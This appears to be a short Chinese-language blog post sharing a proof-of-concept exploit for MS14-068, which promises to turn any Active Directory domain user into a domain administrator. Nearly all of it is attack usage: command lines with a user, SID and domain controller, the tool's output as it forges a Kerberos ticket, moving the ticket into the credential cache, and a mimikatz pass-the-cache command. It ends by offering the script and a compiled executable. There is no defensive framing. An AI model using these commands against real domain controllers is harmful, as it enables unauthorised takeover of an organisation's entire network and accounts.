MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

from: Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) USAGE: [php] -u @ -s -d OPTIONS: -p --rc4 Example usage : Linux (tested with samba and MIT Kerberos) root@kali:~/sploit/pykek# python -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc Password: [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0 [/php] On Windows [php] python.exe -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit` [/php] 提供的py脚本 附加转为exe后的程序 ms14-068.exe